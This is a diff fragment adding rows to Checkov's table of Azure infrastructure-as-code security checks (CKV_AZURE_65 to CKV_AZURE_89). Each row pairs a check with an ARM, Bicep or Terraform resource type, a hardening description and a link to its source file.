+| 1769 | CKV_AZURE_65             | resource                         | azurerm_windows_web_app                                                                          | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform               | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                                 |
+| 1770 | CKV_AZURE_66             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables failed request tracing                                                                                                                                                   | arm                     | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                                                               |
+| 1771 | CKV_AZURE_66             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that App service enables failed request tracing                                                                                                                                                   | Bicep                   | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                                                               |
+| 1772 | CKV_AZURE_66             | resource                         | azurerm_app_service                                                                              | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform               | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                                   |
+| 1773 | CKV_AZURE_66             | resource                         | azurerm_linux_web_app                                                                            | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform               | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                                   |
+| 1774 | CKV_AZURE_66             | resource                         | azurerm_windows_web_app                                                                          | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform               | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                                   |
+| 1775 | CKV_AZURE_67             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | arm                     | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                                                 |
+| 1776 | CKV_AZURE_67             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Bicep                   | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                                                 |
+| 1777 | CKV_AZURE_67             | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | arm                     | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                                                 |
+| 1778 | CKV_AZURE_67             | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Bicep                   | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                                                 |
+| 1779 | CKV_AZURE_67             | resource                         | azurerm_function_app                                                                             | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform               | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                                     |
+| 1780 | CKV_AZURE_67             | resource                         | azurerm_function_app_slot                                                                        | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform               | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                                     |
+| 1781 | CKV_AZURE_68             | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server disables public network access                                                                                                                                             | arm                     | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py)                                                                 |
+| 1782 | CKV_AZURE_68             | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server disables public network access                                                                                                                                             | Bicep                   | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py)                                                                 |
+| 1783 | CKV_AZURE_68             | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server disables public network access                                                                                                                                             | Terraform               | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py)                                                     |
+| 1784 | CKV_AZURE_69             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Azure SQL database servers                                                                                                                                   | Terraform               | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py)                                                                           |
+| 1785 | CKV_AZURE_70             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | arm                     | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                                           |
+| 1786 | CKV_AZURE_70             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Bicep                   | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                                           |
+| 1787 | CKV_AZURE_70             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | arm                     | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                                           |
+| 1788 | CKV_AZURE_70             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Bicep                   | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                                           |
+| 1789 | CKV_AZURE_70             | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | arm                     | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                                           |
+| 1790 | CKV_AZURE_70             | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Bicep                   | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                                           |
+| 1791 | CKV_AZURE_70             | resource                         | azurerm_function_app                                                                             | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1792 | CKV_AZURE_70             | resource                         | azurerm_function_app_slot                                                                        | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1793 | CKV_AZURE_70             | resource                         | azurerm_linux_function_app                                                                       | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1794 | CKV_AZURE_70             | resource                         | azurerm_linux_function_app_slot                                                                  | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1795 | CKV_AZURE_70             | resource                         | azurerm_windows_function_app                                                                     | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1796 | CKV_AZURE_70             | resource                         | azurerm_windows_function_app_slot                                                                | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform               | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1797 | CKV_AZURE_71             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Managed identity provider is enabled for web apps                                                                                                                                            | arm                     | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py)                                                                       |
+| 1798 | CKV_AZURE_71             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Managed identity provider is enabled for web apps                                                                                                                                            | Bicep                   | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py)                                                                       |
+| 1799 | CKV_AZURE_71             | resource                         | azurerm_app_service                                                                              | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform               | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                           |
+| 1800 | CKV_AZURE_71             | resource                         | azurerm_linux_web_app                                                                            | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform               | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                           |
+| 1801 | CKV_AZURE_71             | resource                         | azurerm_windows_web_app                                                                          | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform               | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                           |
+| 1802 | CKV_AZURE_72             | resource                         | Microsoft.Web/sites                                                                              | Ensure that remote debugging is not enabled for app services                                                                                                                                             | arm                     | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py)                                                                   |
+| 1803 | CKV_AZURE_72             | resource                         | Microsoft.Web/sites                                                                              | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Bicep                   | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py)                                                                   |
+| 1804 | CKV_AZURE_72             | resource                         | azurerm_app_service                                                                              | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform               | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                                       |
+| 1805 | CKV_AZURE_72             | resource                         | azurerm_linux_web_app                                                                            | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform               | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                                       |
+| 1806 | CKV_AZURE_72             | resource                         | azurerm_windows_web_app                                                                          | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform               | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                                       |
+| 1807 | CKV_AZURE_73             | resource                         | Microsoft.Automation/automationAccounts/variables                                                | Ensure that Automation account variables are encrypted                                                                                                                                                   | arm                     | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py)                                                                                                   |
+| 1808 | CKV_AZURE_73             | resource                         | Microsoft.Automation/automationAccounts/variables                                                | Ensure that Automation account variables are encrypted                                                                                                                                                   | Bicep                   | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py)                                                                                                   |
+| 1809 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_bool                                                                 | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1810 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_datetime                                                             | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1811 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_int                                                                  | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1812 | CKV_AZURE_73             | resource                         | azurerm_automation_variable_string                                                               | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform               | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1813 | CKV_AZURE_74             | resource                         | Microsoft.Kusto/clusters                                                                         | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                                                                                                             | arm                     | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py)                                                                             |
+| 1814 | CKV_AZURE_74             | resource                         | Microsoft.Kusto/clusters                                                                         | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                                                                                                             | Bicep                   | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py)                                                                             |
+| 1815 | CKV_AZURE_74             | resource                         | azurerm_kusto_cluster                                                                            | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                                                                                                             | Terraform               | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py)                                                                 |
+| 1816 | CKV_AZURE_75             | resource                         | Microsoft.Kusto/clusters                                                                         | Ensure that Azure Data Explorer uses double encryption                                                                                                                                                   | arm                     | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py)                                                         |
+| 1817 | CKV_AZURE_75             | resource                         | Microsoft.Kusto/clusters                                                                         | Ensure that Azure Data Explorer uses double encryption                                                                                                                                                   | Bicep                   | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py)                                                         |
+| 1818 | CKV_AZURE_75             | resource                         | azurerm_kusto_cluster                                                                            | Ensure that Azure Data Explorer uses double encryption                                                                                                                                                   | Terraform               | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py)                                             |
+| 1819 | CKV_AZURE_76             | resource                         | Microsoft.Batch/batchAccounts                                                                    | Ensure that Azure Batch account uses key vault to encrypt data                                                                                                                                           | arm                     | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py)                                                           |
+| 1820 | CKV_AZURE_76             | resource                         | Microsoft.Batch/batchAccounts                                                                    | Ensure that Azure Batch account uses key vault to encrypt data                                                                                                                                           | Bicep                   | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py)                                                           |
+| 1821 | CKV_AZURE_76             | resource                         | azurerm_batch_account                                                                            | Ensure that Azure Batch account uses key vault to encrypt data                                                                                                                                           | Terraform               | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py)                                               |
+| 1822 | CKV_AZURE_77             | resource                         | azurerm_network_security_group                                                                   | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform               | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                         |
+| 1823 | CKV_AZURE_77             | resource                         | azurerm_network_security_rule                                                                    | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform               | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                         |
+| 1824 | CKV_AZURE_78             | resource                         | Microsoft.Web/sites                                                                              | Ensure FTP deployments are disabled                                                                                                                                                                      | arm                     | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py)                                                                                                   |
+| 1825 | CKV_AZURE_78             | resource                         | Microsoft.Web/sites                                                                              | Ensure FTP deployments are disabled                                                                                                                                                                      | Bicep                   | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py)                                                                                                   |
+| 1826 | CKV_AZURE_78             | resource                         | azurerm_app_service                                                                              | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform               | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                                       |
+| 1827 | CKV_AZURE_78             | resource                         | azurerm_linux_web_app                                                                            | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform               | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                                       |
+| 1828 | CKV_AZURE_78             | resource                         | azurerm_windows_web_app                                                                          | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform               | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                                       |
+| 1829 | CKV_AZURE_79             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for SQL servers on machines                                                                                                                                      | arm                     | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py)                                                                                 |
+| 1830 | CKV_AZURE_79             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for SQL servers on machines                                                                                                                                      | Bicep                   | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py)                                                                                 |
+| 1831 | CKV_AZURE_79             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for SQL servers on machines                                                                                                                                      | Terraform               | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py)                                                                       |
+| 1832 | CKV_AZURE_80             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | arm                     | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                                                                         |
+| 1833 | CKV_AZURE_80             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Bicep                   | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                                                                         |
+| 1834 | CKV_AZURE_80             | resource                         | azurerm_app_service                                                                              | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform               | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                             |
+| 1835 | CKV_AZURE_80             | resource                         | azurerm_windows_web_app                                                                          | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform               | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                             |
+| 1836 | CKV_AZURE_81             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'PHP version' is the latest, if used to run the web app                                                                                                                                      | arm                     | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py)                                                                                                 |
+| 1837 | CKV_AZURE_81             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'PHP version' is the latest, if used to run the web app                                                                                                                                      | Bicep                   | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py)                                                                                                 |
+| 1838 | CKV_AZURE_81             | resource                         | azurerm_app_service                                                                              | Ensure that 'PHP version' is the latest, if used to run the web app                                                                                                                                      | Terraform               | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py)                                                                                     |
+| 1839 | CKV_AZURE_82             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'Python version' is the latest, if used to run the web app                                                                                                                                   | arm                     | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py)                                                                                           |
+| 1840 | CKV_AZURE_82             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'Python version' is the latest, if used to run the web app                                                                                                                                   | Bicep                   | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py)                                                                                           |
+| 1841 | CKV_AZURE_82             | resource                         | azurerm_app_service                                                                              | Ensure that 'Python version' is the latest, if used to run the web app                                                                                                                                   | Terraform               | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py)                                                                               |
+| 1842 | CKV_AZURE_83             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'Java version' is the latest, if used to run the web app                                                                                                                                     | arm                     | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py)                                                                                               |
+| 1843 | CKV_AZURE_83             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'Java version' is the latest, if used to run the web app                                                                                                                                     | Bicep                   | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py)                                                                                               |
+| 1844 | CKV_AZURE_83             | resource                         | azurerm_app_service                                                                              | Ensure that 'Java version' is the latest, if used to run the web app                                                                                                                                     | Terraform               | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py)                                                                                   |
+| 1845 | CKV_AZURE_84             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for Storage                                                                                                                                                      | arm                     | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py)                                                                                             |
+| 1846 | CKV_AZURE_84             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for Storage                                                                                                                                                      | Bicep                   | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py)                                                                                             |
+| 1847 | CKV_AZURE_84             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Storage                                                                                                                                                      | Terraform               | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py)                                                                                 |
+| 1848 | CKV_AZURE_85             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for Kubernetes                                                                                                                                                   | arm                     | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py)                                                                                       |
+| 1849 | CKV_AZURE_85             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for Kubernetes                                                                                                                                                   | Bicep                   | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py)                                                                                       |
+| 1850 | CKV_AZURE_85             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Kubernetes                                                                                                                                                   | Terraform               | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py)                                                                           |
+| 1851 | CKV_AZURE_86             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Container Registries                                                                                                                                         | Terraform               | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py)                                                             |
+| 1852 | CKV_AZURE_87             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for Key Vault                                                                                                                                                    | arm                     | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py)                                                                                         |
+| 1853 | CKV_AZURE_87             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that Azure Defender is set to On for Key Vault                                                                                                                                                    | Bicep                   | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py)                                                                                         |
+| 1854 | CKV_AZURE_87             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that Azure Defender is set to On for Key Vault                                                                                                                                                    | Terraform               | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py)                                                                             |
+| 1855 | CKV_AZURE_88             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that app services use Azure Files                                                                                                                                                                 | arm                     | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                                                                         |
+| 1856 | CKV_AZURE_88             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure that app services use Azure Files                                                                                                                                                                 | Bicep                   | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                                                                         |
+| 1857 | CKV_AZURE_88             | resource                         | azurerm_app_service                                                                              | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform               | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                             |
+| 1858 | CKV_AZURE_88             | resource                         | azurerm_linux_web_app                                                                            | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform               | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                             |
+| 1859 | CKV_AZURE_88             | resource                         | azurerm_windows_web_app                                                                          | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform               | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                             |
+| 1860 | CKV_AZURE_89             | resource                         | Microsoft.Cache/redis                                                                            | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | arm                     | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                                                                 |
+| 1861 | CKV_AZURE_89             | resource                         | Microsoft.Cache/redis                                                                            | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | Bicep                   | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                                                                 |
